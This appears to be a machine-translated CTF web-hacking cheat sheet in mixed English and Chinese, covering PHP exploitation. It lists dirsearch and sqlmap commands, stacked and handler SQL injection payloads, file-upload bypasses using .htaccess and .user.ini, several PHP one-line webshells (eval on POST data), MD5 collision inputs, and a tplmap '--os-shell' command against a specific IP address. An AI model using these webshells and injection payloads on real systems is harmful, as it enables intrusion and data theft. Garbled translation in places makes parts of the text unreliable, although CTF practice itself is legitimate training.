Bypass various vulnerabilities in php
Portal: https://cloud.tencent.com/developer/article/2127498
php pseudo-protocol
Detailed blog explanation:
https://blog.csdn.net/cosmoslin/article/details/120695429
http://hummer.vin/2022/05/10/PHP%E4%BC%AA%E5%8D%8F%E8%AE%AE/
https://www.cnblogs.com/wjrblogs/p/12285202.html
already offline to local
It is probably to bypass the filtering information of some files containing functions, such as after base64
encryption
background scan
dirsearch
- scan target
-u,--url 目标url
-l,--url-list=FILE 目标url文件路径
--stdin 从标准输入中指定url
--cidr 目标网段
--raw=File 从文件中读取request报文,通过-schema指定策略(如--schema https)
- Scanned dictionary type
-e,--extensions 包含的文件拓展名(逗号分隔) 如-e php,asp
-X,--exclude-extensions 排除的文件拓展名(逗号分隔) 如-X asp,jsp
-f,--force-extensions 在字典的每条记录后面添加文件拓展名
dirsearch默认只会替换字典中%EXT%为指定的extensions
如-e php Wishlist.%EXT%-->Wishlist.php
- dictionary format
-w,--wordlists 自定义wordlist(以逗号分隔)
--prefixes 添加自定义前缀
--suffixes 添加自定义后缀
--only-selected 筛选出指定的文件拓展名或无文件拓展名的目录
--remove-extensions 移除所有wordlist的后缀名 (admin.php --> admin)
-U, --uppercase 将字典转换为大写
-L, --lowercase 将字典转换为小写
-C, --capital 第一个字母大写剩下字母小写
- Filtering of response results
-i 保留的响应状态码(以逗号分隔,支持指定范围) 如(-i 200,300-399)
-x 排除的响应状态码(以逗号分隔,支持指定范围) 如(-x 301,500-599)
--exclude-sizes 通过大小排除(以逗号分隔) 如(123B,4KB)
--exclude-texts 通过文本内容排除响应('Not found', 'Error')
--exclude-regexps 通过正则匹配排除响应('Not foun[a-z]{1}', '^Error$')
--exclude-redirects 通过正则跳转目标排除响应('https://okta.com/*')
--minimal 最小响应报文长度
--maximal 最大响应报文长度
- Request related settings
-m,--http-method HTTP请求方法 默认为GET
-d,--data HTTP请求数据
-H,--header 请求头 如(-H 'Referer: example.com' -H 'Accept: */*')
--header-list=FILE 从文件中读取请求头
-F,--follow-redirects 跟随HTTP跳转
--user-agent 设置user-agent字段
--cookie 设置cookie
- Connection related settings
--timeout=TIMEOUT 连接超时时间
--ip=IP 服务器ip地址
-s DELAY, --delay=DELAY 每次请求间隔的时间
--proxy=PROXY 代理url 支持HTTP和SOCKS代理 如(localhost:8080, socks5://localhost:8088)
--proxy-list=FILE 包含代理服务器的地址
--matches-proxy=PROXY Proxy to replay with found paths
--scheme 默认的策略 用于从文件中导入请求或url中不包含协议
--max-retries 最大重连次数
-b,--request-by-hostname 强制通过域名连接,(默认为了速度,使用ip连接)
--exit-on-error 出现错误时退出
--debug Debug模式
- general settings
--version 显示dirsearch的版本
-h --help 帮助提示
-r,--recursive 递归爆破
-R,--recursion-depth 最大递归的层数
-t,--threads 线程数
--subdirs 扫描子目录 如(admin/ 则www.example.com/admin/+字典)
--exclude-subdirs 在递归扫描中排除的子目录
-q,--quiet-mode 安静模式
--full-url 打印出完整的url
--no-color 无颜色输出信息
- output mode
--simple-report=OUTPUTFILE
--plain-text-report=OUTPUTFILE
--json-report=OUTPUTFILE
--xml-report=OUTPUTFILE
--markdown-report=OUTPUTFILE
--csv-report=OUTPUTFILE
Common usage:
simple usage
- Scan target url with default settings
python3 dirsearch.py -u https://target
- Scan the target url with a dictionary whose file extension is php, html, js
python3 dirsearch.py -e php,html,js -u https://target
- Scan the target url by using the wordlist with the specified path and the dictionary with the extension name php, html, js
python3 dirsearch.py -e php,html,js -u https://target -w /path/to/wordlist
- recursive scan
python3 dirsearch.py -e php,html,js -u https://target -r
- Set the number of recursive layers to 3
python3 dirsearch.py -e php,html,js -u https://target -r -R 3
- Specify the thread (it is not recommended to adjust the number of threads too large, which may affect the scanning results)
python3 dirsearch.py -e bak,zip,tgz,txt -u https://target -t 30
- use prefix suffix
python3 dirsearch.py -e php -u https://target --prefixes .,admin,_,~
(prefix)
For more information, please refer to: https://blog.csdn.net/qq_43936524/article/details/115271837
version leak
git leak
You can GitHack
download the project code, and then we conduct code audit, using the command as follows:
GitHack.py http://www.openssl.org(目标网址)/.git/
SQL injection
sqli-labs
Notes: https://acmer.blog.csdn.net/article/details/127851636
offline to local
sqlmap
Common commands:
sqlmap -u “注入地址” -v 1 –-dbs # 列举数据库
sqlmap -u “注入地址” -v 1 –-current-db # 当前数据库
sqlmap -u “注入地址” -v 1 –-users # 列数据库用户
sqlmap -u “注入地址” -v 1 -D “数据库” –-tables # 列举数据库的表名
sqlmap.py -u “注入地址” -v 1 -T “表名” -D “数据库” –-columns # 获取表的列名
sqlmap.py -u “注入地址” -v 1 -T “表名” -D “数据库” -C “字段” –-dump # 获取表中的数据
points of attention
-
B: Boolean-based-blind (Boolean injection)
-
U: Union query-based (joint injection)
-
E: Error-based (error-based injection)
-
S: Starked queries (this parameter must be used to read the file system, operating system, and registry through sqlmap, and multi-statement query injection can be used)
-
T: Time-based blind (based on time delay injection)
-
-–batch
Run by default -
--dbs
Blasting database -
-–technique
Specifies the detection technique used by sqlmap
sqlmap -u "http://localhost/Less-1/?id=1" --dbs --batch --technique B
It stands to reason that all types of injection should be run once
- If sometimes the injection point exists, but some other statements cannot be executed, it may be that the keyword is filtered. At this time, we need to consider bypassing by capitalization or double writing, such as common
select
filtering
Stack injection process
Execute multiple statements through the terminator;
such as -1';show databases;#Check all database names
-1';show tables;#Check the database table to find the table name under the available database
or -1';show tables from datebase_name
For the case where union select is disabled 2
-1';show columns from table_name
;#check the field name and note that the table name is directly expressed without adding ''
last -1'; you can use sel/**/ect in the select
flag from request table_name
filter
Sample questions: https://buuoj.cn/challenges#[GYCTF2020]Blacklist
Also need to look at the following handler bypass
the rest bypass
mysql
When querying non-existing data, virtual data will be automatically constructed, and general data storage is either plain text orMD5
For example: https://buuoj.cn/challenges#[GXYCTF2019]BabySQli
handler bypass
grammar:
handler [table_name] open;
handler [table_name] read first;
handler [table_name] read next;
eg: 1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;
XSS injection
See XSS-labs
: https://acmer.blog.csdn.net/article/details/127578322
offline to local
XSS breakthrough: https://blog.csdn.net/m_de_g/article/details/119085955
offline to local
Contains sandbox escape, xss template injection
File Upload Vulnerability
.user.ini
There are files in the directory that needs to be uploaded php
, and then upload a sentence of Trojan horse (here may need to capture and change the package, there may be filtering), and then use Ant Sword to link php
the file, do not link the Trojan horse
Format:
GIF89a
auto_prepend_file=number.png
.htaccess
<FileMatch "digit-shell.png">
SetHandler application/x-httpd-php
</FileMatch>
one word trojan horse
- version-1
<?php @eval($_POST[123]);?>
- version-2
GIF89a
<?php @eval($_POST['shell']);?>
- version-3
GIF89a
<script language='php'>eval($_POST['shell']);</script>
- version-4
picture horse
The content is too big, and it is garbled, so I won't put it up
php serialization and deserialization
This is mainly to test php
the magic function of a class, and the notes are in the ctf-tool
local
md5 bypass
https://blog.csdn.net/LYJ20010728/article/details/116779357
Offline to local
MD5 strong collision
if((string)$_POST['param1']!==(string)$_POST['param2'] && md5($_POST['param1'])===md5($_POST['param2'])){
die("success!);
}
Param1 = %4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2
Param2 =%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
SSTI template injection
https://blog.csdn.net/weixin_53150482/article/details/125842465
The blog has been offline to the local
A comparison 傻瓜
tool:tplmap
Installation tutorial: https://www.cnblogs.com/ktsm/p/15691652.html
Instructions:
- probe injection point
python2 tplmap.py -u 'http://114.67.175.224:11338/?flag'
- Obtain
shell
python2 tplmap.py -u 'http://114.67.175.224:11338/?flag' --os-shell
After obtaining the permission, we will scan flag
the relevant files that may exist, and then make a specific analysis
Sometimes there may be no clues in the file, so take a look env
, maybe it is inside:
Sample question: https://buuoj.cn/challenges#[Flask]SSTI
backup file
.index.php.swp
robots.txt
index.php~
index.php.bak
flask session forgery
https://blog.csdn.net/since_2020/article/details/119543172
already offline
Example: https://buuoj.cn/challenges#[%E7%AC%AC%E4%B8%80%E7%AB%A0%20web%E5%85%A5%E9%97%A8]afr_3
Commonly used headers
- Refer
- Origin
- User-Agent
- X-Forwarded-For
- X-Real-IP
- cookie
Web-tool
download link:
Link: https://pan.baidu.com/s/10lu7wSBREUa3-NreeOquIw
Extraction code: sa6d
– share from super member V3 of Baidu Netdisk
This toolkit is used by the author, and it also contains some notes and materials, you can download it if you need it~